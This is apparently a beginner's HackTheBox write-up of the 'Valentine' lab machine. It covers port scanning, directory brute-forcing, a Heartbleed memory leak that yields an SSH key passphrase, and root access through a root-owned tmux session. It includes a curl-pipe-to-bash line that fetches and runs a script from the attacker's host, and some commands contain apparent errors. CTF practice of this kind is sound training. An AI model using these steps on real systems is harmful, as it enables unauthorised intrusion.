Valentine - A HackTHeBox WriteUp
So, I just started with HackTheBox and the whole idea is truly amazing to have online CTF for hackers all around the world to practise and hone their skills. Another shoutout to IPPSEC, the images used in this writeup is taken from his videos for better understanding.
There couldn’t be a better time to be publishing this article. Love is in the air and for the info-sec folks, vulns are in the machine. So let’s get cracking before someone takes your valentine away.
Let’s dive in!
Connecting to hackthebox machine and setting up OpenVPN you can watch it here. So, I won’t discuss more it and get into the core part where we start opening the doors one by one. The main goal is to gain root access to the valentine Linux box and for now, we only know its IP address ( 10.10.10.79 ).
If you follow any of the previous CTF write-ups then you must know this that whenever we are presented with an IP address then scanning the machine for the open ports is the first step that we always need to carry out.
nmap -sC -sV 10.10.10.79
So, we run the above commands to figure out the open ports on the machine.
The port 22 for the SSH, port 80 for HTTP and port 443 for HTTPS was opened on the machine. The unique thing about the machine arises when we have a look at the version of the SSH and realise that the machine has an out-dated version of Ubuntu installed and so is the Apache version outdated as well.
As soon as we confirm that the system is outdated by doing a normal google search, we check if this outdated version has some well-known vulnerability that can be exploited by us.
We run this script on the machine to figure out the well-known vulnerabilities.
nmap --script vuln -oA nmap/vulnscan 10.10.10.79
The output of the command was as follows, there wasn’t anything regarding the port 22, but for port 80 we have few interesting points that popped up and the port 443 had the same points mentioned again.
There were vulnerabilities that popped up like the SSL/TLS MITM vulnerability ( CSS Injection ) and the SSL Heartbleed. So, from now on at least we know which way we should move to gain root privilege on the machine.
Now, that we have the high probability that the machine is vulnerable to Heartbleed attack so we try to confirm this by using the SSLyze tool.
sslyze --heartbleed 10.10.10.79:443
We use the “--heartbleed” extension to especially confirm that the machine is vulnerable to the Heartbleed or not and we are presented with the following output.
Now, that we have confirmed that the machine is vulnerable to Heartbleed, we try to figure out other attack vectors to get into the system.
The port 80 & 443 is open so we must try to figure out the other resources that are present on this domain and for that, we run a gobuster to search through the directories and find useful domains to explore.
gobuster -u http://10.10.10.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
Once, we run the above command in our Kali box we are shortly presented with the following directories.
We visit these directories one after the another.
This presented us with nothing more than an image of the Heartbleed logo
The same image as the one above popped up when we open up this directory as well.
This directory was interesting as it presented us with the following files.
We first open the notes.txt file which turned out to be a list of instructions for us to follow.
Then I went over to the hype.txt file which seemed like an ASCII code, so we copy the whole thing and paste it in an ASCII converter and it turned out to be a private RSA ssh key. We save the private RSA key in our current folder and change the permissions on the .key file
chmod 600 hype.key
Once, we do that now we can use the private key file to ssh into the valentine box. So, we try to SSH into the machine, we type in the command
ssh -I hype.key 10.10.10.79
The ssh private key works and we are demanded for a passphrase to be entered, but we don’t know the passphrase yet. We terminate the connection and try to figure out the passphrase.
Now, getting back to the basics we know right now that we can have shell access to the machine but we need a passphrase and the machine is vulnerable to Heartbleed, this all points in the direction that we need to carry out the heartbleed attack.
So this image is most easy to understand explanation of heartbleed, you ask the server to reply back potato ( 6 letters ) and it does that, then you ask it to return back bird ( 4 letters ) it does that but when you get creative and tell it to send back hat ( 500 letters ). "Hat" only consists of 3 letters so the server will respond back with "hat" but will also send the next 497 letters next to the hat in the memory where it was saved. This causes a huge memory leak and risks of leaking data that can be extremely important and of high value.
That is why the Heartbleed attack is extremely dangerous and it should be looked into that your servers are not vulnerable.
So, now to exploit the heartbleed vulnerability we search for a code that can help us with that. Here is the link to the github repository that we used to exploit the machine.
The problem with heartbleed is that it is very unpredictable about the output it might present to you. So, to overcome this the heartbleed attack is carried out over and over again in the hope to discover some new information.
We have the heartbleed code with us, we save it our folder and then run the attack on the machine.
python -n 100 heartbleed.py 10.010.10.79
By using ‘-n’ we are running the program for hundred times again and again so as to obtain the maximum amount of information possible.
At the completion of this command, a huge output was presented to us.
We managed to fish this out and from the look of it. You will notice it right away cause most of the information gained was not for use just by the look of it as you can’t make any sense out of it. If you have any idea about coding and decoding you can just tell by viewing at the $text value that it is base64 encoded. So, we go ahead to decode it, by the following command.
Once we received the decoded the base64 message we used it as the passphrase to enter the valentine box via SSH.
Now, that we have shell access we can run commands and check our privilege that we have right now. Ran the “ls” command first we were in the user's directory, then I went into the Desktop directory and again ran the “ls” command and found the users.txt.
Now it was time to run the LinEnum.sh file which is our privilege checker to check our privilege and other details on this machine. We first set up an HTTP web-server on our machine and host the LinEnum.sh file so that we can download the file on our Valentine box.
curl 10.10.14.30/LinEnum.sh | bash
We download the LinEnum.sh on our valentine machine via curl and run the bash file consecutively.
We are presented with a huge file that has immense information regarding the vulnerable box. I need to let you know that this procedure can be time taking and requires a high level of patience. So we found an interesting “.bash_history” file in the “Home directory contents: ”
So, we open up the .bash_history file and we are presented with this output.
We search for the “dev_sess” keyword in the information that we gather via the LinEnum.sh file. We check for processes that are run by the root.
ps -ef | grep root
We are presented with a detailed list of processes that are run by the root.
Seeing, this we run the following command and we find out that the .devs/dev_sess is created by the root user but is under the hype group.
As the process is created under the hype group and hype has the read and write permission.
So, we open up the tmux session on /.devs/dev_sess
And boom we got access as the root user as the process was running and then we can obtain the root.txt file.
And there it is folks the step by step guide to get into the valentine box.
Be familiar with the tools you use, make a clear mental list of the steps you need to take at every step. Don’t give up, that is one thing you will need a lot of while doing these CTFs and try to do them all by yourselves. It is tough in the beginning then you will slowly start to pick up steps along the way.
If you enjoyed it please do clap & let’s collaborate. Get, Set, Hack!
Telegram : https://t.me/aditya12anand
Twitter : twitter.com/aditya12anand
LinkedIn : linkedin.com/in/aditya12anand/
E-mail : [email protected]